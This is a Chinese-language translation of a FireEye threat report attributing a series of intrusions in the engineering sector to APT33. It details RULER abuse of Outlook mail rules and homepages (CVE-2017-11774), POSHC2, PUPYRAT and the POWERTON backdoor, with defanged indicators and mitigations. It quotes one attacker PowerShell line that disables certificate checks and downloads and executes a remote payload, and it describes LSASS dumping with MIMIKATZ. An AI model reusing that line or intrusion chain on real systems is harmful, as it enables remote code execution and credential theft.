APT33可能是工程行業內一系列入侵和企圖入侵的幕後推手

新聞 12-27

一、簡介

FireEye評估APT33可能是工程行業內一系列入侵和企圖入侵的幕後推手。公開報告表明此活動可能與最近的破壞性攻擊SHAMOON有關。FireEye的Managed Defense已經響應並包括了我們評估的許多相關入侵。該攻擊者在入侵的早期階段利用公開可用的工具。然而，我們觀察到它們在後期活動中轉換為定製植入程序試圖繞過檢測。

2017年9月20日，FireEye Intelligence發布了一篇文章，詳細介紹了針對能源和航空航天業的魚叉式網路釣魚活動。最近的公開報告表明，APT33魚叉式網路釣魚與SHAMOON攻擊之間可能存在聯繫;但是，我們無法獨立核實。FireEye的高級實踐團隊利用遙測和積極的主動操作來保持APT33的可見性。這些努力使我們能夠建立一個操作時間表，該操作時間表與在攻擊者完成任務之前確定並包含的多個入侵管理防禦一致。我們使用下面描述的內部開發的相似性引擎來關聯入侵。此外，公開討論還表明，我們觀察到的特定攻擊者基礎設施可能與最近的SHAMOON攻擊有關。

45 days ago, during 24x7 monitoring,#ManagedDefensedetected & contained an attempted intrusion from newly-identified adversary infrastructure*.

It is C2 for a code family we track as POWERTON.

*hxxps://103.236.149[.]100/api/info

— FireEye (@FireEye)December 15, 2018

二、識別威脅行為中的重疊

FireEye應用自身的專業知識和內部開發的相似性引擎，來評估組織和行動之間的潛在關聯和關係。使用文檔聚類和主題建模的概念，該引擎提供了一個框架，用於計算和發現活動組織之間的相似性，為後續分析提供調查線索。我們的引擎確定了工程行業內一系列入侵之間的相似之處。近乎實時的結果有助於深入的比較分析。FireEye分析了來自眾多入侵和已知APT33活動的所有可用有機信息。隨後我們以中等信心得出結論，兩個特定的早期階段入侵系同一組織行為。之後，高級實踐團隊基於去年觀察到的確認的APT33活動重建了操作時間表。我們將其與所包含的入侵的時間線進行了比較，並確定在規定的時間範圍內，在工具選擇中包含很明顯的相似性。我們低等信心地評估入侵是由APT33進行的。此博客僅包含原始源材料，而包含全源分析的Finished Intelligence可在我們的門戶網站中找到。為了更好的理解對手使用的技術，有必要在24x7全天候監控期間提供有關此活動的Managed Defense響應的背景信息。

三、Managed Defense快速反應：調查攻擊者

2017年11月中旬，Managed Defense確定並響應了針對工程行業客戶的威脅活動。攻擊者利用竊取的憑據和公開可用的工具——SensePost的RULER來配置客戶端郵件規則，旨在從自己控制的WebDAV伺服器85.206.161[.]214@443outlooklive.exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f)下載並執行惡意載荷。

有效載荷是一個AutoIT下載程序，它從hxxps://85.206.161[.]216:8080/HomePage.htm獲取並執行其他PowerShell。後續的PowerShell依據目標系統的架構，下載合適的PowerSploit變種（MD5：c326f156657d1c41a9c387415bf779d4或0564706ec38d15e981f71eaf474d0ab8），並反射載入PUPYRAT（MD5：94cd86a0a4d747472c2b3f1bc3279d77或17587668AC577FCE0B278420B8EB72AC）。該攻擊者利用公開可用的CVE-2017-0213漏洞提升許可權，公開可用的Windows SysInternals PROCDUMP轉儲LSASS進程，以及公開提供的MIMIKATZ竊取其他憑據。Managed Defense有助於受害者控制入侵。

FireEye收集了168個PUPYRAT樣本進行比較。雖然導入哈希值（IMPHASH）不足以歸因溯源，但我們發現，在指定的抽樣中，攻擊者的IMPHASH僅在六個樣本中被發現，其中兩個被確認屬於在Managed Defense中觀察到的威脅行為者，並且一個歸於APT33。我們還確定APT33可能在此期限內從PowerShell EMPIRE過渡到PUPYRAT。

在2018年7月中旬，Managed Defense確定了針對同一行業的類似針對性威脅活動。該攻擊者利用竊取的憑據和利用CVE-2017-11774（RULER.HOMEPAGE）漏洞的RULER模塊，修改了眾多用戶的Outlook客戶端主頁，以實現代碼執行和持久性。這些方法在本文「RULER In-The-Wild」章節中進一步探討。

攻擊者利用這種持久性機制來下載和執行公開可用的.NET POSHC2後門的OS依賴變體，以及一個新發現的基於PowerShell的植入程序POWERTON。Managed Defens迅速參與並成功控制了入侵。值得注意的是，Advanced Practices分別確定APT33至少從2018年7月2日開始使用POSHC2，並在2018年期間繼續使用。

在7月的活動期間，Managed Defense觀察了hxxp://91.235.116[.]212/index.html上託管的主頁漏洞利用的三個變體。一個例子如圖1所示。

圖1：攻擊者的主頁利用（CVE-2017-11774）

每個漏洞利用程序中的主編碼有效載荷使用WMIC進行系統分析，以確定適當的依賴於操作系統的POSHC2植入程序，並將名為「Media.ps1」的PowerShell腳本保存在用戶的％LOCALAPPDATA％目錄中（％LOCALAPPDATA％MediaWsMedia.ps1），如圖2所示。

圖2：攻擊者的「Media.ps1」腳本

「Media.ps1」的目的是解碼並執行下載的二進位有效載荷，該有效載荷寫入磁碟文件「C:UsersPublicDownloadslog.dat」。在後續階段，此PowerShell腳本將通過配置註冊表Run鍵，在主機上維持持久性。

對「log.dat」有效載荷的分析確定它們是公開可用的POSHC2的變體，用於從硬編碼的命令和控制（C2）地址下載和執行PowerShell有效載菏。這些特定的POSHC2樣本在.NET框架上運行，並從Base64編碼的字元串動態載入有效載荷。植入程序通過HTTP向C2伺服器（hxxps://51.254.71[.]223/images/static/content/）發送偵察報告，之後的響應為PowerShell源代碼。偵察報告包含以下信息：

·用戶名和域名

·計算機名

·CPU詳細信息

·當前exe的PID

·配置C2伺服器

C2消息使用硬編碼密鑰的AES加密，並使用Base64編碼。正是這個POSHC2二進位文件為前面提到的「Media.ps1」PowerShell腳本建立了持久性，然後在系統啟動時解碼並執行POSHC2二進位文件。在2018年7月確定的活動期間，POSHC2變體的配置終止日期為2018年7月29日。

利用POSHC2下載並執行一個新的基於PowerShell的植入程序，命名為POWERTON（hxxps://185.161.209[.]172/api/info）。在此期間，攻擊者在與POWERTON的互動方面取得了部分進展該攻擊者能夠下載名為「ClouldPackage.exe」的AutoIt二進位文件（MD5：46038aa5b21b940099b0db413fa62687）並建立持久性，這是通過POWERTON 「persist」命令實現的。「ClouldPackage.exe」的唯一功能是執行以下PowerShell代碼：

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; $webclient = new-object System.Net.WebClient; $webclient.Credentials = new-object System.Net.NetworkCredential("public", "fN^4zJpZ_a!QXr*]&2j8Ye"); iex $webclient.DownloadString("hxxps://185.161.209[.]172/api/default")

此代碼的目的是從C2伺服器獲取「靜默模式」POWERTON。請注意，攻擊者使用強大的憑據保護其後續有效載荷。在此之後不久，Managed Defense遏制了入侵。

大約三周後，攻擊者通過密碼枚舉成功的重建訪問許可權。Managed Defense立即確定了使用RULER部署惡意主頁的攻擊者在工作站上持續存在。他們對一些基礎設施和工具進行了更改，包含額外的混淆層以規避檢測。攻擊者在新的C2伺服器（hxxp://5.79.66[.]241/index.html）上託管他們的主頁漏洞利用。在此期間，至少發現了三個「index.html」的新變種。其中兩個變體包含編寫的PowerShell代碼，用於下載新的依賴於OS的.NET POSHC2的變體，如圖3所示。

圖3：特定操作系統的POSHC2下載器

圖3顯示攻擊者進行了一些小的更改，例如編碼PowerShell 「DownloadString」命令並將生成的POSHC2和.ps1文件重命名保存在磁碟上。解碼後，命令將嘗試從另一個新的C2伺服器（hxxp://103.236.149[.]124/delivered.dat）下載POSHC2二進位文件。為解碼並執行POSHC2變體而釋放的.ps1的文件名也更改為「Vision.ps1」。在2018年8月的活動期間，POSHC2變體配置的「終止日期」為2018年8月13日。請注意，POSHC2支持終止日期，以便隨時間保護入侵，並且此功能內置於框架中。

再次，POSHC2用於下載POWERTON的新變種（MD5：c38069d0bc79acdc28af3820c1123e53），配置為與C2域名hxxps://basepack[.]org通信。在8月下旬的某個時刻，在POSHC2終止日期之後，攻擊使用RULER.HOMEPAGE直接下載POWERTON，繞過先前觀察到的中間階段。

由於Managed Defense對這些入侵的早期遏制，我們無法確定攻擊者的動機;但很明顯，他們強烈要求獲得並維持對受害者網路的訪問。

四、基礎設施監控

高級實踐團隊進行積極主動的操作，以便大規模地識別和監控攻擊者基礎設施。2018年7月16日至10月11日期間，攻擊者在hxxp://91.235.116[.]212/index.html維持RULER.HOMEPAGE有效載荷。至少在2018年10月11日，攻擊者改變了有效載荷（MD5）：8be06571e915ae3f76901d52068e3498），該有效載荷從hxxps://103.236.149[.]100/api/info（MD5：4047e238bbcec147f8b97d849ef40ce5）下載並執行POWERTON樣本。此特定的URL在公開討論中被識別為可能與最近的破壞性攻擊有關。我們無法用擁有的任何有機信息獨立驗證此相關性。

在2018年12月13日，Advanced Practices主動識別並歸因hxxp://89.45.35[.]235/index.html（MD5：f0fe6e9dde998907af76d91ba8f68a05）上託管的惡意RULER.HOMEPAGE有效載荷。此有效載荷用於下載和執行託管在hxxps://staffmusic[.]org/transfer/view（MD5：53ae59ed03fa5df3bf738bc0775a91d9）的POWERTON。

表1包含我們所分析活動的操作時間表。

表1: 操作時間線

五、展望和啟示

如果在這些入侵期間觀察到的活動與APT33相關聯，則表明APT33可能保留了我們之前未曾觀察到的專有能力，直到來自Managed Defense的持續壓力迫使其使用。FireEye Intelligence此前曾報道，APT33與破壞性惡意軟體有關，它們對關鍵基礎設施構成了更大的風險。這種風險在能源部門是顯而易見的，我們一直監測它們的目標。該目標與伊朗國家經濟增長優勢和競爭優勢相一致，特別是與石化生產有關。

我們將繼續獨立跟蹤這些組織，直到我們確信它們是相同的。除了根據需要的專有植入程序之外，所描述的每個入侵背後的操作者都使用了公眾可獲得但未廣泛理解的工具和技術。Managed Defense有權每天在各種行業和對手中接觸入侵活動。這一日常的前線體驗得到了高級實踐團隊，FireEye實驗室高級逆向工程（FLARE）和FireEye Intelligence的支持，為我們的客戶提供了他們可以對付複雜對手的所有方法。我們歡迎其他原始來源信息，以確認或駁斥我們的分析判斷。

六、定製化後門: POWERTON

POWERTON是一個用PowerShell編寫的後門程序; FireEye尚未發現任何具有類似代碼庫的公開工具集，表明它可能是定製的。POWERTON旨在支持多種持久性機制，包括WMI和自動運行註冊表項。與C2的通信是通過TCP / HTTP（S）進行的，並利用AES加密與C2之間的通信流量。POWERTON通常作為後期後門進行部署，並使用多層混淆處理。

FireEye觀測到了至少兩個獨立版本的POWERTON，分別為POWERTON.v1和POWERTON.v2，並進行了跟蹤，其中後者改進了其命令和控制功能，並集成了轉儲密碼哈希的功能。

表2包含POWERTON的樣本。

表2: POWERTON 惡意軟體樣本

七、攻擊方法：崛起的電子郵件利用

Outlook和Exchange無處不在。用戶便利性是技術進步背後的主要驅動力，但用戶的便捷訪問通常會為攻擊者提供額外的攻擊面。隨著機構在公共互聯網向其用戶開放電子郵件伺服器的訪問，使其成為入侵媒介。FireEye觀察到攻擊的增加對Exchange和Office365的安全控制提出了挑戰和顛覆。在2018年FireEye網路防禦峰會，我們的Mandiant顧問還提供了幾種攻擊者使用的新方法，用於破壞多因素身份驗證。

在FireEye，我們的決策是數據驅動的，但提供給我們的數據通常是不完整的，必須根據我們的專業知識推斷缺失的部分，以便我們有效地應對入侵。利用的合理方案如下。

攻擊者通過任何方式收集機構為用戶提供的一對有效憑據，以下並非所有詳盡示例：

·在之前的入侵中，憑據已被泄露但未被識別或重置。

·弱口令或密碼安全策略導致暴力破解憑據。

·從各種其他來源收集可破解的密碼哈希值，例如通過用於進行網路釣魚的文檔收集的用戶NTLM哈希值。

·憑據收集網路釣魚詐騙，其中收集的憑據可以在互聯網上的其他地方永久銷售，重複使用或記錄。

攻擊者擁有合法憑據後，即可識別未受多因素身份驗證保護的可公開訪問的Outlook Web Access（OWA）或Office 365。攻擊者利用竊取的憑據和RULER等工具通過Exchange的合法功能開展漏洞利用。

八、無所不在的RULER

SensePost的RULER是一種工具，旨在通過基於HTTP協議的消息傳遞應用程序編程介面（MAPI）或遠程過程調用（RPC）與Exchange伺服器進行交互。正如2017年11月中旬的「Managed Defense快速響應」部分所述，FireEye監測到了單個主機上現有Outlook電子郵件客戶端進程生成的網路活動，通過Web分散式創作和版本控制（WebDAV）與攻擊者控制的IP地址85.206.161 [.] 214進行連接。此通信獲取使用Aut2Exe（MD5：95f3bea43338addc1ad951cd2d42eb6f）創建的可執行文件，並執行PowerShell代碼以獲取更多惡意內容。

儘管沒有受影響郵箱的日誌記錄，我們仍然可以評估此活動是使用上述工具創建的惡意郵件規則的結果，原因如下：

·Outlook.exe通過WebDAV直接請求在攻擊者IP地址上託管的惡意可執行文件。除非直接利用Outlook的某些功能，否則這是意料之外的;像網路釣魚這樣的傳統媒介會顯示一個父進程，其中Outlook產生了Office、Acrobat或類似的子進程。進程注入意味著先前在主機上執行惡意代碼，這些證據不支持。

·95f3bea43338addc1ad951cd2d42eb6f的轉輸是通過WebDAV進行的。RULER通過公開一個簡單的WebDAV伺服器和一個命令行模塊來實現這一點，該命令行模塊用於創建指向該WebDAV託管的有效載荷的客戶端郵件規則。

·在初始傳輸階段選擇WebDAV是郵件規則創建限制的結果;在保存規則之前，有效載荷必須是「本地」可訪問的，這意味著不允許使用HTTP或FTP之類的協議。這一點在之前Silent Break Security有關RULER創建的初步報告中進行了詳細介紹。這使通過UNC文件路徑的SMB和WebDAV成為Outlook規則傳輸惡意載荷的可用選項。從網路角度來看，WebDAV可能不會引起重視，因為與發現通過埠80和443連接到互聯網的WebDAV事務相比，發現域內主機通過SMB與任意IP地址的非域內主機進行通信更引人關注。

·通過Outlook客戶端郵件規則執行的有效載荷不能包含任何參數，這可能是選擇已編譯的Aut2exe可執行文件的原因。 95f3bea43338addc1ad951cd2d42eb6f除了執行PowerShell單行程序以獲取其他惡意內容外，什麼都不做。但是，由於此限制，無法使用Outlook規則在本機執行此命令。

考慮到這一點，初始感染如圖4所示。

圖4：初始感染載體

隨著攻擊者和防禦者繼續探索電子郵件安全，很快就會採用公開發布的技術和漏洞。 SensePost對CVE-2017-11774的識別和負責任的披露並沒有什麼不同。有關從攻擊者的角度濫用Outlook主頁的shell和持久性的絕佳描述，請參閱SensePost的博客（SensePost"s blog）。

FireEye觀察到測並記載了幾個惡意攻擊者使用這種特定主頁開發技術的情況。根據我們的經驗，由於防禦者曲解並專註於不正確的緩解方法，這種特殊方法可能會更成功。這是可以理解的，因為一些維護者在觀察導致惡意代碼執行的Outlook產生過程時可能首先了解了CVE-2017-11774的成功利用。當此觀察結果與可能類似於惡意HTML應用程序（.hta）附件的獨立取證工具相結合時，證據可能會被誤解為通過網路釣魚電子郵件的初始感染。這個錯誤的假設忽略了攻擊者需要有效憑據來部署CVE-2017-11774的事實，因此感染的範圍可能大於已發現主頁持久性的個人用戶Outlook客戶端。為幫助防禦者，我們在文末包含了一個Yara規則來區分這些Outlook主頁有效載荷。

了解這種細微差別進一步突出了此攻擊者結合密碼枚舉使用此技術的風險，並強調了分層電子郵件安全防禦的重要性，包括多因素身份驗證和補丁管理。我們建議組織儘可能減少其電子郵件攻擊面。值得注意的是，選擇通過雲服務提供商託管其電子郵件的組織仍必須確保用於訪問該伺服器的軟體客戶端已修補。除了為Outlook 365 / Exchange訪問實施多因素身份驗證之外，表3中的Microsoft安全更新還將有助於減輕已知和記載的攻擊媒介，這些攻擊媒介會被工具包（如SensePost的RULER）利用。

表3: Outlook 攻擊面緩解

九、檢測技術

FireEye在我們的平台上檢測到此活動，包括POSHC2，PUPYRAT和POWERTON的命名檢測。表4包含幾個適用於電子郵件利用和初始感染活動的特定檢測名稱。